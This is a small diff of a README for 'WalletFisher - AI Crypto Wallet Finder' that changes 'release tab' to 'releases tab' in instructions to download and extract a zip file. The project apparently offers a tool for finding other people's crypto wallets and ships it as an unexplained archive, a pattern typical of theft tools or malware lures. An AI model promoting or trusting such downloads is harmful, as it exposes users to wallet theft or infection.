WalletFisher/AI-Crypto-Wallet-Finder/README.md

 WalletFisher - AI Crypto Wallet Finder

-**First, download the AI Crypto Wallet Finder.zip file from release tab.
+**First, download the AI Crypto Wallet Finder.zip file from releases tab.

 **Extract all files into a folder.